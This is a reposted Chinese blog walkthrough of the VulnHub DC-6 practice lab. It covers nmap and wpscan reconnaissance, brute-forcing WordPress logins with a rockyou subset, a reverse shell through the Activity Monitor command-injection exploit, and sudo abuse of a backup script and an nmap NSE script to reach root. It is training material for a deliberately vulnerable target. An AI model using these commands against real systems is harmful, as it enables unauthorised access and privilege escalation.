靶場練習第十四天~vulnhub靶場之dc-6

一、準備工作

kali和靶機都選擇NAT模式(kali與靶機同網段)

1.靶場環境

下載鏈接: 百度網盤 請輸入提取碼 提取碼: bazx

2.kali的ip

命令:ifconfig

3.靶機的ip

掃描靶機ip

命令:sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)掃描靶機開放的端口及其服務

nmap -sV -p- 192.168.101.119

(2)看看詳細信息

nmap -A -p- 192.168.101.119

2.網站的信息收集

(1)訪問靶機的網站

1.先從80端口尋找突破口,訪問一下http://192.168.101.119 ,發現URL欄寫的不是靶機的ip,而是http://wordy/,而很明顯,DNS沒有解析出來

2.回過頭來注意到nmap掃描時有這樣一個提示,基本可以確認需要手動配置hosts文件

(2)配置hosts文件

1.sudo vim /etc/hosts ;在文件添加:192.168.101.115(靶機ip) wordy

2.再次訪問http://192.168.101.115

沒有發現啥有用信息,只是知道這個是一個WordPress網站

(3)用wpscan工具看看這個靶機網站有什么用戶

wpscan --url http://wordy --enumerate u

發現了幾個用戶

(4)用dirb掃描看看網站的后臺登錄是哪個網址

dirb http://wordy

1.打開http://wordy/wp-admin/ ,發現登錄網址

(5)wpscan字典爆破

1.在桌面創建一個wordy-pass1.dic文件

2.將rockyou.txt里面的密碼復制到wordy-pass1.dic

cd /usr/share/wordlists/

ls

cp rockyou.txt /home/kali/桌面/wordy-pass1.dic

3.將剛才得到的用戶放在文件user.txt

vim user.txt

cat user.txt

3.使用wpscan進行密碼爆破

常規的方法跑太費時間,把一部分密碼拿出來跑

cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic

wpscan --ignore-main-redirect --url http://wordy -U user.txt -P wordy-pass1.dic --force

得出Username: mark, Password: helpdesk01

用爆破出來的用戶密碼登錄

成功登錄到網站后臺

(6)使用mark用戶登錄后臺,發現一個插件Activity monitor,猜測這個插件存在漏洞

1.searchsploitg工具查看Activity monitor漏洞

searchsploit Activity monitor

發現是命令注入漏洞

(1)修改html代碼action跳轉及shell反彈IP地址到kali本機

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

cp 45274.html 45274.html.bak

vim 45274.html

(2)Kali臨時開啟HTTP服務,并訪問45274.html頁面

python -m SimpleHTTPServer 80

同時在kali終端這邊開啟監聽9999端口,在頁面點擊submit request后,反彈shell成功

(3)優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

三、提權

1. 進入到mark用戶的家目錄下,stuff文件下有一個things-to-do.txt文件,查看文件內容發現graham用戶及登錄密碼

cd /home/mark/stuff

ls

cat things-to-do.txt

2.用得到的用戶密碼ssh遠程登錄

ssh graham@192.168.101.119

3. graham用戶成功登錄后,查看當前用戶可以執行的操作

sudo -l

發現可以運行jens用戶下面的backups.sh

4.查看backups.sh

cd /home/jens

ls

cat backups.sh

5. 在backups.sh文件中寫入/bin/bash,并以jens用戶去執行該腳本

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

6.獲得jens用戶權限時,查看jens用戶可執行的操作

sudo -l

發現jens用戶可以在無密碼狀態下使用nmap命令

7. 發現flag

寫入一條命令到getShell,并通過nmap運行getShell成功進入root用戶,在/root目錄下找到theflag.txt文件

echo 'os.execute("/bin/sh")' > getShell

sudo ?nmap ?--script=getShell

cd /root

cat theflag.txt

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375042.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375042.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375042.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

最短路徑Dijkstra算法和Floyd算法整理、

轉載自:http://www.cnblogs.com/biyeymyhjob/archive/2012/07/31/2615833.html 最短路徑—Dijkstra算法和Floyd算法 Dijkstra算法 1.定義概覽 Dijkstra(迪杰斯特拉)算法是典型的單源最短路徑算法,用于計算一個節點到其他所有節點的最短路徑。主要特點是以…

Java Script 中 ==(Equal) 和 === (Identity Equal) 的區別和比較算法邏輯

判斷兩個變量是否相等在任何編程語言中都是非常重要的功能。 JavaScript 提供了 和 兩種判斷兩個變量是否相等的運算符,但我們開始學習的時候 JavaScript 的時候,就被一遍又一遍的告知: 要求變量的類型和值均相等,才能返回true…

靶場練習第十五天~vulnhub靶場之dc-7

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1&…

ubuntu系統下如何修改host

Ubuntu系統的Hosts只需修改/etc/hosts文件,在目錄中還有一個hosts.conf文件,剛開始還以為只需要修改這個就可以了,結果發現是需要修改hosts。修改完之后要重啟網絡。具體過程如下:1、修改hostssudo gedit /etc/hosts2、添加解析記…

Matplotlib不顯示圖形

安裝好了Matplotlib,使用官方一個例子測試運行時,發現使用畫圖功能時,運行腳本老是顯示不出圖像,Google了一下,后來發現是matplotlibrc文件沒配置好。 參考了官方文檔,修改步驟如下 1.查找matplotlibrc文件…

靶場練習第十六天~vulnhub靶場之dc-8

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1&…

【SpringMVC】SpringMVC系列4之@RequestParam 映射請求參數值

4、RequestParam 映射請求參數值 4.1、概述 Spring MVC 通過分析處理方法的簽名,將 HTTP 請求信息綁定到處理方法的相應人參中。Spring MVC 對控制器處理方法簽名的限制是很寬松的,幾乎可以按喜歡的任何方式對方法進行簽名。必要時可以對方法及方法入…

Sprint3

進展:今天主要是各自熟悉安卓應用開發平臺,設計了圖標,沒什么實際上的進展。 燃盡圖: 團隊工作照: 轉載于:https://www.cnblogs.com/XJXYJ/p/4495810.html

靶場練習第十七天~vulnhub靶場之dc-9

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1&am…

Linux內核分析 02

二,操作系統是如何工作的 1、函數調用堆棧 三大法寶:存儲程序計算機 函數調用堆棧 中斷機制 堆棧:是C語言程序運行時必須的一個記錄調用路徑和參數的空間。是計算機內部現成的東西,我們直接使用。 包括函數調用框架、傳遞參數、保…

一 UI基本的用法

1. UIView的基本用法 //打印屏幕的寬和高CGRect screenBounds [[UIScreen mainScreen] bounds];NSLog("%f, %f", screenBounds.size.width, screenBounds.size.height);//創建一個UIView//UIView表示一個矩形區域UIView *v1 [[UIView alloc] init];//1.確定大小CGR…

靶場練習第十八天~vulnhub靶場之hackableII

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)掃描靶機開…

Object-c基礎(2)

類和對象 類 在Object-c中類,其接口(interface)和實現(implementation)是分離開來的 類的聲明 interface 類名:父類名{實例變量的定義;}方法聲明;...end類的實現 implementation 類名方法定義...end對象 一個類提供…

arm linux 下移植busybox 的tftp

(1)進入busybox目錄,make menuconfig ,然后在networking中勾選tftp項跟tftpd項。 (2)配置/etc/inetd.conf 中關于tftp的選項(此部未驗證,不需要應該也可以) tftp dgra…

靶場練習第二十天~vulnhub靶場之Funbox: Scriptkiddie

一、環境搭建 靶官網機下載地址:Funbox: Scriptkiddie ~ VulnHub 百度云盤下載鏈接: 百度網盤 請輸入提取碼 提取碼: i4a9 二、信息收集 1.nmap命令掃描靶機 先用ifconfig查看kali的IP,因為kali和靶機都是NAT模式下,所以用 nmap 192.168…

documentbodyscrollTop的值總為零的解決辦法

有一個功能需要判斷返回頂部按鈕是否顯示。 JS代碼如下: var sTop document.body.scrollTop;if(sTop>100){document.getElementById("sm_top").style.display"block";}else{document.getElementById("sm_top").style.display&quo…

spring mvc 多線程并發

ThreadLocal為解決多線程程序的并發問題提供了一種新的思路。使用這個工具類可以很簡潔地編寫出優美的多線程程序。 http://www.xuebuyuan.com/1628190.html 我們知道Spring通過各種DAO模板類降低了開發者使用各種數據持久技術的難度。這些模板類都是線程安全的,也就…

靶場練習第十九天~vulnhub靶場之GreenOptic: 1

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)掃描靶機開…

靶場練習第二十五天~vulnhub靶場之Raven-2

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)掃描靶機開放的…

每天一個linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics(虛擬內存統計)的縮寫,可對操作系統的虛擬內存、進程、CPU活動進行監控。他是對系統的整體情況進行統計,不足之處是無法對某個進程進行深入分析。vmstat 工具提供了一種低開銷的系統性能觀察方…